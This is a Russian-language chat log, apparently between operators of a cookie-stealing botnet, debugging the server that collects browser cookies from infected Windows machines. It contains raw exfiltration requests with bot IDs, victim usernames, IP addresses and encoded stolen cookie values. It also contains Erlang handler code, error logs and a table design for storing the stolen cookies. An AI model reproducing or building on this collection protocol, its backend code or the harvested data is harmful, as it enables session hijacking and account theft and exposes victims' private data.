2021-08-30 13:28:03.095285	defender	ttrr	да и если есть там реальный срач, давайте напишите мне регулярку по которой я отсеку в нджинксе все кроме норм запросов
2021-08-30 13:28:03.098557	ttrr	defender	да и если есть там реальный срач, давайте напишите мне регулярку по которой я отсеку в нджинксе все кроме норм запросов
2021-08-30 14:30:22.897053	defender	ttrr	все видят что я пишу?
2021-08-30 14:30:22.898304	ttrr	defender	все видят что я пишу?
2021-08-30 14:30:26.954072	defender	ttrr	смотрите?
2021-08-30 14:30:26.955301	ttrr	defender	смотрите?
2021-08-30 14:30:38.865911	ttrr	defender	Я вижу.
2021-08-30 14:31:11.735008	ttrr	defender	Я пока не понял как мне сообщение посмотреть и тело запроса.
\x16\x03\x03\x00\xC2\x01\x00\x00\xBE\x03\x03a,O\xBC\xF5\xC6\xCFw\x958\xE8\x15O@\xBD)\xC5\xD3\xCA\x81\xE2\xA7i\xAF\xCCg\xA9[6k_/\x00\x00&\xC0,\xC0+\xC00\xC0/\xC0$\xC0#\xC0(\xC0'\xC0
2021-08-30 14:31:31.400586	ttrr	defender	Вот такое есть, это бинарные данные?
2021-08-30 14:32:37.708285	defender	ttrr	вот есть так как ты написал
2021-08-30 14:32:37.709748	ttrr	defender	вот есть так как ты написал
2021-08-30 14:32:44.613632	defender	ttrr	в не понятной кодировке
2021-08-30 14:32:44.614318	ttrr	defender	в не понятной кодировке
2021-08-30 14:32:47.115748	defender	ttrr	а есть норм
2021-08-30 14:32:47.116615	ttrr	defender	а есть норм
2021-08-30 14:32:53.464012	defender	ttrr	200.58.180.138 -  [30/Aug/2021:17:31:45 +0300] "POST /mor1/WIN-OQR8NN197GR_W639600.5B505F7FFC79B12CBB3622DF3CBB3B1C/84/ HTTP/1.1" 403 182 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64
; Trident/7.0; .NET4.0E; .NET4.0C; InfoPath.3; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)" "-----------KRLRMIKEGVGXNTPQ\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\nUtente2|Ch
rome|dGFncy5hZHNhZmV0eS5uZXQ=|RElE|OTUxNTg3OGU0MjIzODM5YmQ4MjQxNzhjZTIwYTBjMDM=|1546590957|2147483641|Lw==\r\nUtente2|Chrome|dGFncy5hZHNhZmV0eS5uZXQ=|SURU|MTAw|1546590957|2147483641|Lw==\r\nUtente2|Chrom
e|dGFncy5hZHNhZmV0eS5uZXQ=|VUlE|OTUxNTg3OGU0MjIzODM5YmQ4MjQxNzhjZTIwYTBjMDM=|1546590957|2147483641|Lw==\r\nUtente2|Chrome|LmFkc2FmZXR5Lm5ldA==|Y3RfZGlk|OTUxNTg3OGU0MjIzODM5YmQ4MjQxNzhjZTIwYTBjMDM=|154659
0957|2147483641|Lw==\r\nUtente2|Chrome|LmFkc2FmZXR5Lm5ldA==|Y3RfaWR0|MTAw|1546590957|2147483641|Lw==\r\nUtente2|Chrome|LmFkc2FmZXR5Lm5ldA==|Y3RfdWlk|OTUxNTg3OGU0MjIzODM5YmQ4MjQxNzhjZTIwYTBjMDM=|154659095
7|2147483641|Lw==\r\nUtente2|Chrome|dGFncy5hZHNhZmV0eS5uZXQ=|dg==|Mg==|1546590957|2147483641|Lw==\r\nUtente2|Chrome|Lmdvb2dsZS5jb20=|Q09OU0VOVA==|WUVTK0lULml0K1YxMg==|1550218723|2146723192|Lw==\r\nUtente
2|Chrome|Lmdvb2dsZS5pdA==|Q09OU0VOVA==|WUVTK0lULml0K1YxMg==|1550218724|2146723192|Lw==\r\nUtente2|Chrome|LnlvdXR1YmUuY29t|Q09OU0VOVA==|WUVTK0lULml0K1YxMg==|1550218724|2146723192|Lw==\r\nUtente2|Chrome|Lm
ludGVudGlxLmNvbQ==|SVF2ZXI=|MS45|1562134121|1877494136|Lw==\r\nUtente2|Chrome|LmhvdGVscy5jb20=|X2Nsc192|MGE5ZTdlN2UtZGY1Mi00YWQzLWI0YjItY2UxZGI0MGQ1MWU5|1562134143|1719814143|Lw==\r\nUtente2|Chrome|LnRya
XZhZ28uY29t|Y3RpZA==|SzRETTU1bm1JMzdIQzVudXZUTXBveFhROU4=|1562134117|2147483643|Lw==\r\nUtente2|Chrome|d3d3LnRyaXZhZ28uaXQ=|ZnR2|JTdCJTIyZnR2JTIyJTNBJTIyMjAxOTA3MDMwNjA4NDAlMjIlMkMlMjJsdHYlMjIlM0ElMjIyMD
E5MDcwMzA2MDg0MCUyMiUyQyUyMmVwJTIyJTNBOTk5OSUyQyUyMmNudHYlMjIlM0ExJTJDJTIyY250YyUyMiUzQTElMkMlMjJjbnRjcyUyMiUzQTElMkMlMjJmZXAlMjIlM0E5OTk5JTJDJTIydmMlMjIlM0EwJTJDJTIyY3RsJTIyJTNBOTk5JTJDJTIyY3RmJTIyJTNBO
Tk5JTJDJTIyaXRlbSUyMiUzQTIzMTMxNjglMkMlMjJwYXRoJTIyJTNBNDU4MTclMkMlMjJwYXRoMiUyMiUzQW51bGwlN0Q=|1562134136|2147483644|Lw==\r\nUtente2|Chrome|Lnd3dy50cml2YWdvLml0|aW50ZW50X21lZGlhX3ByZWZz||1562134121|-210
1681175|Lw==\r\nUtente2|Chrome|ZHVzLnRyaXZhZ28uY29t|c0xhbmd1YWdlTG9jYWxl|VUs=|1562134117|2147483643|Lw==\r\nUtente2|Chrome|c2VjZGUudHJpdmFnby5jb20=|c0xhbmd1YWdlTG9jYWxl|VUs=|1562134120|2147483643|Lw==\r\
nUtente2|Chrome|LnRyaXZhZ28uY29t|dGlk|N2JXQjhlZzVSalZ1VUI2Rm1hOXFTMXZXSlQ=|1562134140|2147483643|Lw==\r\nUtente2|Chrome|LnRyaXZhZ28uaXQ=|dGlk|NGFBWHhYNldhaG5IWmhHRm1PVFRLNkpVYl8=|1562134117|2147483643|Lw
==\r\nUtente2|Chrome|LnRyaXZhZ28uY29t|dHJ2X3RpZA==|N2JXQjhlZzVSalZ1VUI2Rm1hOXFTMXZXSlQ=|1562134140|2147483643|Lw==\r\nUtente2|Chrome|LnRyaXZhZ28uaXQ=|dHJ2X3RpZA==|NGFBWHhYNldhaG5IWmhHRm1PVFRLNkpVYl8=|156

...
...........
2021-08-30 14:32:53.470023	ttrr	defender	200.58.180.138 -  [30/Aug/2021:17:31:45 +0300] "POST /mor1/WIN-OQR8NN197GR_W639600.5B505F7FFC79B12CBB3622DF3CBB3B1C/84/ HTTP/1.1" 403 182 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64
; Trident/7.0; .NET4.0E; .NET4.0C; InfoPath.3; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)" "-----------KRLRMIKEGVGXNTPQ\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\nUtente2|Ch
rome|dGFncy5hZHNhZmV0eS5uZXQ=|RElE|OTUxNTg3OGU0MjIzODM5YmQ4MjQxNzhjZTIwYTBjMDM=|1546590957|2147483641|Lw==\r\nUtente2|Chrome|dGFncy5hZHNhZmV0eS5uZXQ=|SURU|MTAw|1546590957|2147483641|Lw==\r\nUtente2|Chrom
e|dGFncy5hZHNhZmV0eS5uZXQ=|VUlE|OTUxNTg3OGU0MjIzODM5YmQ4MjQxNzhjZTIwYTBjMDM=|1546590957|2147483641|Lw==\r\nUtente2|Chrome|LmFkc2FmZXR5Lm5ldA==|Y3RfZGlk|OTUxNTg3OGU0MjIzODM5YmQ4MjQxNzhjZTIwYTBjMDM=|154659
0957|2147483641|Lw==\r\nUtente2|Chrome|LmFkc2FmZXR5Lm5ldA==|Y3RfaWR0|MTAw|1546590957|2147483641|Lw==\r\nUtente2|Chrome|LmFkc2FmZXR5Lm5ldA==|Y3RfdWlk|OTUxNTg3OGU0MjIzODM5YmQ4MjQxNzhjZTIwYTBjMDM=|154659095
7|2147483641|Lw==\r\nUtente2|Chrome|dGFncy5hZHNhZmV0eS5uZXQ=|dg==|Mg==|1546590957|2147483641|Lw==\r\nUtente2|Chrome|Lmdvb2dsZS5jb20=|Q09OU0VOVA==|WUVTK0lULml0K1YxMg==|1550218723|2146723192|Lw==\r\nUtente
2|Chrome|Lmdvb2dsZS5pdA==|Q09OU0VOVA==|WUVTK0lULml0K1YxMg==|1550218724|2146723192|Lw==\r\nUtente2|Chrome|LnlvdXR1YmUuY29t|Q09OU0VOVA==|WUVTK0lULml0K1YxMg==|1550218724|2146723192|Lw==\r\nUtente2|Chrome|Lm
ludGVudGlxLmNvbQ==|SVF2ZXI=|MS45|1562134121|1877494136|Lw==\r\nUtente2|Chrome|LmhvdGVscy5jb20=|X2Nsc192|MGE5ZTdlN2UtZGY1Mi00YWQzLWI0YjItY2UxZGI0MGQ1MWU5|1562134143|1719814143|Lw==\r\nUtente2|Chrome|LnRya
XZhZ28uY29t|Y3RpZA==|SzRETTU1bm1JMzdIQzVudXZUTXBveFhROU4=|1562134117|2147483643|Lw==\r\nUtente2|Chrome|d3d3LnRyaXZhZ28uaXQ=|ZnR2|JTdCJTIyZnR2JTIyJTNBJTIyMjAxOTA3MDMwNjA4NDAlMjIlMkMlMjJsdHYlMjIlM0ElMjIyMD
E5MDcwMzA2MDg0MCUyMiUyQyUyMmVwJTIyJTNBOTk5OSUyQyUyMmNudHYlMjIlM0ExJTJDJTIyY250YyUyMiUzQTElMkMlMjJjbnRjcyUyMiUzQTElMkMlMjJmZXAlMjIlM0E5OTk5JTJDJTIydmMlMjIlM0EwJTJDJTIyY3RsJTIyJTNBOTk5JTJDJTIyY3RmJTIyJTNBO
Tk5JTJDJTIyaXRlbSUyMiUzQTIzMTMxNjglMkMlMjJwYXRoJTIyJTNBNDU4MTclMkMlMjJwYXRoMiUyMiUzQW51bGwlN0Q=|1562134136|2147483644|Lw==\r\nUtente2|Chrome|Lnd3dy50cml2YWdvLml0|aW50ZW50X21lZGlhX3ByZWZz||1562134121|-210
1681175|Lw==\r\nUtente2|Chrome|ZHVzLnRyaXZhZ28uY29t|c0xhbmd1YWdlTG9jYWxl|VUs=|1562134117|2147483643|Lw==\r\nUtente2|Chrome|c2VjZGUudHJpdmFnby5jb20=|c0xhbmd1YWdlTG9jYWxl|VUs=|1562134120|2147483643|Lw==\r\
nUtente2|Chrome|LnRyaXZhZ28uY29t|dGlk|N2JXQjhlZzVSalZ1VUI2Rm1hOXFTMXZXSlQ=|1562134140|2147483643|Lw==\r\nUtente2|Chrome|LnRyaXZhZ28uaXQ=|dGlk|NGFBWHhYNldhaG5IWmhHRm1PVFRLNkpVYl8=|1562134117|2147483643|Lw
==\r\nUtente2|Chrome|LnRyaXZhZ28uY29t|dHJ2X3RpZA==|N2JXQjhlZzVSalZ1VUI2Rm1hOXFTMXZXSlQ=|1562134140|2147483643|Lw==\r\nUtente2|Chrome|LnRyaXZhZ28uaXQ=|dHJ2X3RpZA==|NGFBWHhYNldhaG5IWmhHRm1PVFRLNkpVYl8=|156

...
...........
2021-08-30 14:33:11.247644	defender	ttrr	хооооотя код 403
2021-08-30 14:33:11.250259	ttrr	defender	хооооотя код 403
2021-08-30 14:33:14.505420	defender	ttrr	почему
2021-08-30 14:33:14.509284	ttrr	defender	почему
2021-08-30 14:33:57.054343	defender	ttrr	zulas: давай разбираться
2021-08-30 14:33:57.055738	ttrr	defender	zulas: давай разбираться
2021-08-30 14:36:02.443816	ttrr	defender	POST /mor1/WIN-OQR8NN197GR_W639600.5B505F7FFC79B12CBB3622DF3CBB3B1C/84/ HTTP/1.1
2021-08-30 14:36:21.829127	ttrr	defender	это наш запрос, если не ошибаюсь это куки
2021-08-30 14:36:35.158722	ttrr	defender	zulas: поясни почему 403
2021-08-30 14:38:38.673000	defender	ttrr	buza: давай я тебе скину креды, может ты тоже посмотришь логи?
2021-08-30 14:38:38.674301	ttrr	defender	buza: давай я тебе скину креды, может ты тоже посмотришь логи?
2021-08-30 14:38:38.679421	ttrr	defender	В конце данные обрезаны
2021-08-30 14:38:49.483189	defender	ttrr	просто чувствую что гл=де то рядом ответ
2021-08-30 14:38:49.485148	ttrr	defender	просто чувствую что гл=де то рядом ответ
2021-08-30 14:38:54.993772	ttrr	defender	Это так скопировалось?
2021-08-30 14:39:04.022728	defender	ttrr	driver: это я обрезал, там дохрена
2021-08-30 14:39:04.024612	ttrr	defender	driver: это я обрезал, там дохрена
2021-08-30 14:39:24.309952	ttrr	defender	Ок
2021-08-30 14:39:40.411567	ttrr	defender	defender: в последний раз когда я этим занимался (еще будучи разработчиком того самого модуля который эти данные шлет), коды ошибки приходили от бэкенда в случае если ему данные не нравились
2021-08-30 14:40:13.905387	ttrr	defender	т.е. тут нужно указание от зуласа, начиная с какого смещения в этом запросе данные невалидны (по мнению парсящей их библиотеки)
2021-08-30 14:41:26.281242	defender	ttrr	так да, но пока он думает, можетт у тебя мысли будут
2021-08-30 14:41:26.282595	ttrr	defender	так да, но пока он думает, можетт у тебя мысли будут
2021-08-30 14:42:45.465443	ttrr	defender	403 Forbidden шлет во многих случаях .. самый общий это неверный URL .. потом всякие баны и т.п.
2021-08-30 14:43:27.699283	defender	ttrr	у тебя есть конкретный сервер с конкретной базой и софтом + логи
2021-08-30 14:43:27.700992	ttrr	defender	у тебя есть конкретный сервер с конкретной базой и софтом + логи
2021-08-30 14:43:31.444261	defender	ttrr	рзберись плиз
2021-08-30 14:43:31.445786	ttrr	defender	рзберись плиз
2021-08-30 14:43:35.528319	ttrr	defender	для 84 команды конкретно тут может быть что он ожидает данные формы .. multipart но там ничего нет
2021-08-30 14:43:54.454778	ttrr	defender	я сваливаю сейчас . смогу только завтра . так что сорян
2021-08-30 14:44:08.984350	defender	ttrr	кто в жабе кодер модуля?
2021-08-30 14:44:08.985609	ttrr	defender	кто в жабе кодер модуля?
2021-08-30 14:44:21.701708	defender	ttrr	надо добавить его сюда
2021-08-30 14:44:21.703657	ttrr	defender	надо добавить его сюда
2021-08-30 14:44:40.863464	defender	ttrr	zulas: утром?
2021-08-30 14:44:40.865232	ttrr	defender	zulas: утром?
2021-08-30 14:45:04.424764	ttrr	defender	ога
2021-08-30 14:45:04.864845	defender	ttrr	чтобы сюда кодера модуля подтянуть к этому времени
2021-08-30 14:45:04.865980	ttrr	defender	чтобы сюда кодера модуля подтянуть к этому времени
2021-08-30 14:46:32.016234	ttrr	defender	еще надо в лог писать длину пост данных .. потому что у меня лимит 64 кб
2021-08-30 14:46:43.414760	ttrr	defender	[19:43:23] <dgh> Там надо посмотреть весь лог, суть в том что должно быть по 8 полей 
[19:43:39] <dgh> И точно такую же ошибку нам выдавало когда их было больше или меньше 
[19:43:52] <dgh> И возвращало типа что то Missmatch parametr count 
[19:43:55] <dgh> В ответе
2021-08-30 14:46:48.423199	ttrr	defender	таймаут по чтению - 50 секунд
2021-08-30 14:46:58.654548	ttrr	defender	Это еще можно проверить
2021-08-30 14:48:08.519598	ttrr	defender	да .. надо логировать ответ сервера .. там 403 может быть с пояснением
2021-08-30 14:48:52.504786	ttrr	defender	[ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
такие колонки должны быть
2021-08-30 14:50:31.728438	ttrr	defender	у меня может в глазах двоится .. но я насчитал в запросе 15 колонов в пост-дата
2021-08-30 14:50:37.208069	ttrr	defender	колонок
2021-08-30 14:50:57.647931	ttrr	defender	Я по этому куску разбил по 8 везде
2021-08-30 14:51:05.432246	ttrr	defender	Или ты полный лог глядишь
2021-08-30 14:51:06.971204	ttrr	defender	?
2021-08-30 14:51:14.893244	ttrr	defender	хотя нет .. 8 )
2021-08-30 14:51:36.059121	ttrr	defender	То что в лимит уперлось кстати вероятно.
2021-08-30 14:51:39.705820	ttrr	defender	короче надо ответ сервера логировать . будет понятнее . .есть такая возможсность ? )
2021-08-30 14:51:39.738748	ttrr	defender	Тоже
2021-08-30 14:51:51.344087	ttrr	defender	и размер запроса
2021-08-30 14:52:13.543966	ttrr	defender	свалил )
2021-08-30 14:54:50.405321	ttrr	defender	сейчас автор модуля должен зайти
2021-08-30 15:09:35.351747	ttrr	defender	Готово
2021-08-30 15:15:06.289114	ttrr	defender	
» [ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
Разработчик админки ещё планирует 2 поля в конец добавить: Secure, HttpOnly
2021-08-30 15:18:47.857248	defender	ttrr	зулас будет      утром, надо вам с ним быть тут на связи, есть логи данных которые идут, они не проходят в бекенд, зулас скажет почему, и тут надо либо тебе либо ему править
2021-08-30 15:18:47.858527	ttrr	defender	зулас будет      утром, надо вам с ним быть тут на связи, есть логи данных которые идут, они не проходят в бекенд, зулас скажет почему, и тут надо либо тебе либо ему править
2021-08-30 19:40:45.766661	ttrr	defender	defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
2021-08-31 08:20:34.374781	ttrr	defender	ну и ?
2021-08-31 08:20:44.476293	ttrr	defender	одному мне больше всез надо ?
2021-08-31 08:21:25.224393	ttrr	defender	со вчера вечера что-то писали тут?
2021-08-31 08:23:54.168012	ttrr	defender	zulas: скинь еще раз кусок того POSTа, который был отвергнут бэком
2021-08-31 08:24:17.349591	ttrr	defender	А тут истории нет?
Писал по поводу новых полей в записи куки
2021-08-31 08:24:26.070879	ttrr	defender	нету истории
2021-08-31 08:26:45.180251	ttrr	defender	ну так на чем остановились?
2021-08-31 08:27:19.305071	ttrr	defender	я остановился на этом: вот был POST, с виду нормальный, бэк на него 403 сказал. Я попросил зуласа сказать что в нем не так
2021-08-31 08:27:38.955056	ttrr	defender	а я попросил расширить лог . чтобы логировало ответ
2021-08-31 08:27:51.220181	ttrr	defender	и размер запроса
2021-08-31 08:29:36.039814	ttrr	defender	а ты steller ?
2021-08-31 08:31:18.951385	ttrr	defender	Писал по поводу новых полей в записи куки
2021-08-31 08:33:03.544064	ttrr	defender	что именно?
2021-08-31 08:33:15.475971	ttrr	defender	403 встречалась раньше ошибка
-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="data"

user|Chrome|.google.com|ANID|	djEw171ep2SDF+UMAcWRRWBcsbp5H34/V0frREuTTKAE2F3BXw3fVVHhgYgcKidlSSPxtTs32WPiqcV/p021G67RLpNXgRDrMqljrJ16Ml1Ckwz2a2URAQ==|1588241125|1651313125|/
user|Chrome|.register.com|__utma|	djEwnpzEp2a3+eOKByaEj0nLtLL7HGvIusWq1obAuia9wTCz3pPEUF6A+gFpZ3LHPf2GSueVelCwgrXMR96kV8MmLcClokQ=|1588241143|1651313173|/

-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="source"

Chrome cookies
-----------CJLVIYOINTQPMYSU--

403
Mismatch parameters count!
2021-08-31 08:33:43.138232	ttrr	defender	zulas: сколько полей в куки у тебя сейчас?
steller: а у тебя?
2021-08-31 08:34:59.532730	ttrr	defender	[ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
2021-08-31 08:35:00.848581	ttrr	defender	вот поля
2021-08-31 08:35:14.267893	ttrr	defender	разделитель |
2021-08-31 08:35:28.661565	ttrr	defender	Разработчик админки планирует добавить 2 поля secure, httponly в конец записи.
Сейчас:
Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path
2021-08-31 08:35:46.673724	ttrr	defender	разделители строк: [ <<10>>, <<13,10>>]
2021-08-31 08:37:31.165104	ttrr	defender	403 была, когда некоторые поля не кодировались в В64. В отстойнике они безусловно декодировались.
2021-08-31 08:38:28.752644	ttrr	defender	А что по поводу максимального размера данных, он ограничен 64КБ будет?
2021-08-31 08:39:10.938323	ttrr	defender	{read_length, 64000},
{read_timeout, 50000}
я могу и больше сделать
2021-08-31 08:39:15.179160	ttrr	defender	таковы требоания были
2021-08-31 08:40:40.543070	ttrr	defender	50000 это в миллисекундах
2021-08-31 08:43:47.770055	ttrr	defender	В модуле нет такого ограничения. Можно разбить на несколько запросов, в принципе.
А какие ошибки отстойник может отдавать? Их желательно как-то обрабатывать.
403 добавил в обработку. На модуль приходили ещё 404 и 500. 500, видимо, от прокладки.
2021-08-31 08:45:02.926573	ttrr	defender	при успешном приеме и добавлении в базу dero всегда выдает 200 и /1/ ?
2021-08-31 08:45:20.941343	ttrr	defender	403 ошибка формата данных?
2021-08-31 08:45:42.352793	ttrr	defender	просо 200 бывает без /1/ ?
2021-08-31 08:45:46.770547	ttrr	defender	просто
2021-08-31 08:46:17.064232	ttrr	defender	zulas:
2021-08-31 08:47:07.169959	ttrr	defender	зачем этот /1/ ?
2021-08-31 08:47:10.015099	ttrr	defender	reply(not_found, Req) ->
 { ok, Req1 } = cowboy_req:reply(404, [], <<"Not found">>, Req),
 Req1;

reply(forbidden, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [], <<"Forbidden">>, Req),
 Req1;

reply(missing_data, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing data field!">>, Req),
 Req1;

reply(missing_keys, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing keys field!">>,  Req),
 Req1;

reply(missing_parameters, Req) ->
 {ok,Req1} = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Mismatch parameters count!">>,  Req),
 Req1;

reply(request_timeout, Req) ->
 {ok,Req1} = cowboy_req:reply(408, [{<<"Request Timeout">>, <<"text/plain">>}], <<"Request Timeout">>,  Req),
 Req1;
2021-08-31 08:47:16.137092	ttrr	defender	вот такие ошибки бывают
2021-08-31 08:47:22.016734	ttrr	defender	текст у вас отобразился ?
2021-08-31 08:47:31.375906	ttrr	defender	а то у меня пиджин -- и нифига
2021-08-31 08:47:40.868776	ttrr	defender	отразился
2021-08-31 08:48:11.907021	ttrr	defender	200 бывает без /1/ ?
2021-08-31 08:48:50.547354	ttrr	defender	по коду вроде не бывает
2021-08-31 08:48:57.441234	ttrr	defender	почуму спрашиваю - нужно ли в модуле проверять получение /1/ или достаточно получить статус 200 ?
2021-08-31 08:49:06.641955	ttrr	defender	[11:47:07] <hof> зачем этот /1/ ?
так по тз
2021-08-31 08:49:25.813162	ttrr	defender	это типа следующая команда для клиента
2021-08-31 08:49:29.556971	ttrr	defender	т.е. 200 без /1/ не бывает?
2021-08-31 08:49:55.929589	ttrr	defender	не бывает
2021-08-31 08:50:06.569346	ttrr	defender	ок, отлично
2021-08-31 08:50:53.719173	ttrr	defender	zulas: А сейчас логирование запросов http есть, их можно проверить?
2021-08-31 08:51:29.470308	ttrr	defender	есть
2021-08-31 08:52:48.116306	ttrr	defender	Скинь тогда проблемные запросы.
2021-08-31 08:58:25.519678	ttrr	defender	2021-08-31 11:52:22.415 [info] <0.6857.3> Data: <<"POST /tot57/WIN-U4U2CDE99LP_W617601.8C95D48B33FF1976677889D52ABB8859/84/ HTTP/1.0\r\nHost: 203.76.105.227\r\nX-Real-IP: 203.76.105.227\r\nX-Forwarded-For: 203.76.105.227\r\nConnection: close\r\nContent-Length: 11059\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=---------MOBMWAMXGTKVMATK\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\r\nCache-Control: no-cache\r\n\r\n-----------MOBMWAMXGTKVMATK\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L2NvbXBsZXRlL3NlYXJjaA==\r\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L3NlYXJjaA==\r\nAdministrador|C...">>
 State: {state,#Port<0.108426>,ranch_tcp,[cowboy_router,cowboy_handler],false,[{listener,http},{dispatch,[{'_',[],[{['...'],[],http_handler,[{limits,32768,1024,4096,102400,8529920,8388608,1024}]}]}]}],undefined,undefined,5,1,100,4096,64,4096,100,5000,1630399947415}
 ReqEmpty 0
2021-08-31 11:52:22.416 [critical] <0.6857.3>@http_handler:handle:33 Error {badmatch,false} [{base64,decode_binary,2,[{file,"base64.erl"},{line,212}]},{http_handler,'-save84/3-fun-4-',5,[{file,"src/http_handler.erl"},{line,329}]},{lists,foreach,2,[{file,"lists.erl"},{line,1338}]},{http_handler,save84,3,[{file,"src/http_handler.erl"},{line,325}]},{http_handler,handle,2,[{file,"src/http_handler.erl"},{line,30}]},{cowboy_handler,handler_handle,4,[{file,"src/cowboy_handler.erl"},{line,111}]},{cowboy_protocol,execute,4,[{file,"src/cowboy_protocol.erl"},{line,443}]}]
2021-08-31 08:58:38.142487	ttrr	defender	вот . не может басе64 декодировать
2021-08-31 08:58:42.754674	ttrr	defender	не знаю какое поле
2021-08-31 08:59:10.713149	ttrr	defender	крашей больше нет
2021-08-31 08:59:29.607501	ttrr	defender	всмысли тех что хттп2
2021-08-31 09:05:10.043465	ttrr	defender	Это старые данные. Сейчас модуль отправляет Username, Domain, Cookie_name, Cookie_value, Path  в В64
2021-08-31 09:05:45.411146	ttrr	defender	[ Group, IdLow, IdHigh, base64:decode(Username), Browser, Domain, base64:decode(Cookie_name), base64:decode(Cookie_value), Created, Expires, base64:decode(Path) ]);

вот 4 поля декодируются только
2021-08-31 09:05:49.214683	ttrr	defender	надо все ?
2021-08-31 09:07:35.427134	ttrr	defender	Нужно домен ещё декодировать
2021-08-31 09:08:11.256023	ttrr	defender	ок .. добавил в новых версиях .
2021-08-31 09:09:24.730497	ttrr	defender	<<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">> [<<"tot138">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<"Firefox">>,<<".mail.ru">>,<<"mrcu">>,<<"14B45890605336B122FB29388502">>,<<"1399543312">>,<<"1714903312">>,<<"/">>]
2021-08-31 11:52:59.108 [error] <0.6879.3>@db:transform:58 Error {error,error,<<"22021">>,<<"invalid byte sequence for encoding \"UTF8\": 0x95">>,[]} with query {<<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">>,[<<"tot138">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<"Firefox">>,<<".mail.ru">>,<<"mrcu">>,<<"14B45890605336B122FB29388502">>,<<"1399543312">>,<<"1714903312">>,<<"/">>]}

есть еще такое
2021-08-31 09:09:32.432487	ttrr	defender	на УТФ-8 не походит кодировка
2021-08-31 09:09:59.454449	ttrr	defender	И ещё нужно 2 поля добавить в конец записи.
secure, httponly
Значения: 0 & 1
2021-08-31 09:10:00.429096	ttrr	defender	насколько я понимаю это про <<149,166,247>>
2021-08-31 09:10:26.178326	ttrr	defender	в таблицу колонки ?
2021-08-31 09:10:55.307271	ttrr	defender	Да, в запись поле, в таблицу колонки.
2021-08-31 09:11:43.256889	ttrr	defender	А юникод в каком поле не проходит?
2021-08-31 09:20:09.639586	ttrr	defender	,<<149,166,247>> я думаю вот это не может быть юникодом
2021-08-31 09:20:45.226170	ttrr	defender	юзернейм
2021-08-31 09:22:08.343290	ttrr	defender	Похоже, пользователь. Скорее всего модуль не отправляет UTF8. Нужно проверить.
А ты можешь в readme этот формат добавить + описание ошибок?
Мы уже много времени потратили на поиск этих ошибок из-за отсутствия описания протокола обмена.
2021-08-31 09:23:06.134565	ttrr	defender	формат чего ?
2021-08-31 09:23:49.261348	ttrr	defender	в каталог doc есть некоторое описалово
2021-08-31 09:23:54.884028	ttrr	defender	Кукисов, например. Ещё бы хорошо остальные данные проверить.
2021-08-31 09:24:07.886080	ttrr	defender	Там кукисы описаны?
2021-08-31 09:24:16.334757	ttrr	defender	какие кукисы ?
2021-08-31 09:24:39.285701	ttrr	defender	Куки, печенюшки
2021-08-31 09:24:57.064274	ttrr	defender	я понял что такое куки, но к чему ты это говоришь ?
2021-08-31 09:25:05.869960	ttrr	defender	1. Создать новую команду для получения данных куки. Например, код команды 84

2. Создать таблицу для хранения данных (псевдокод SQL):
CREATE TABLE cookies (
  id SERIAL,
  username VARCHAR(255),
  browser VARCHAR(255)
  domain VARCHAR(255)
  cookie_name VARCHAR(255)
  cookie_value VARCHAR(255)
  created DATETIME,
  expires DATETIME,
  path VARCHAR(255)
);

3. Обеспечить прием данных в следующем формате:
- простой текст, разделенный на строки.
